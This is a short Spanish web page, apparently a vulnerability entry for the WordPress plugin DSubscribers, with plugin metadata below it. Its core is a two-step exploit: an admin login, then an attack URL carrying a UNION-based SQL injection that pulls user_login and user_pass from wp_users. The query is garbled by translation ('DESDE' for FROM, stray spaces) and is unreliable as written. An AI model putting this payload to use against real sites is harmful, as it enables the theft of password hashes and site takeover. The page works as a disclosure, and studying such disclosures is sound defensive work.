Vulnerabilidad Plugin: DSubscribers

  1. Iniciar sesión con usuario administrador:
  2. URL de ataque: http: //target/wp-admin/admin.php? Page = dsubscribers & action = edit & dsubscribers = 0 UNION SELECT 1,2, CONCAT (user_login, char (58), user_pass) DESDE wp_users WHERE ID = 1

Ficha del Plugin

Versión Actual: 1.2.1
Requisitos: 3.9
Probado en WordPress: 4.9.12
Total Descargas: 1,498
Última actualización: 2018-05-03 5:36pm GMT

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Ir arriba